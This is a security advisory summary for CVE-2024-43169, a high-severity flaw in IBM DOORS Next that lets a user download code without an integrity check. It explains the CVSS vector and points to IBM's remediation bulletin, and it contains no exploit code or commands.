CVE-2024-43169
Published: 03 March 2025
Description
An adversary may rely upon a user opening a malicious file in order to gain execution.
Security Summary
IBM Engineering Requirements Management DOORS Next versions 7.0.2, 7.0.3, and 7.1 are affected by CVE-2024-43169, a vulnerability that allows a user to download a malicious file without verifying the integrity of the code. This issue, classified under CWE-494 (Download of Code Without Integrity Check), has a CVSS v3.1 base score of 8.8, indicating high severity due to its potential for significant impact.
An unauthenticated remote attacker (PR:N) with network access (AV:N) can exploit this vulnerability by tricking a user into performing an action (UI:R), such as clicking a link or downloading a file, with low attack complexity (AC:L). Successful exploitation could result in high confidentiality, integrity, and availability impacts (C:H/I:H/A:H), potentially allowing arbitrary code execution on the victim's system within an unchanged security scope (S:U).
For mitigation details, including available patches and remediation steps, refer to the IBM security bulletin at https://www.ibm.com/support/pages/node/7184506.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The vulnerability (CWE-494) involves downloading code without integrity verification, directly enabling an attacker to trick a user into downloading and executing a malicious file, leading to arbitrary code execution.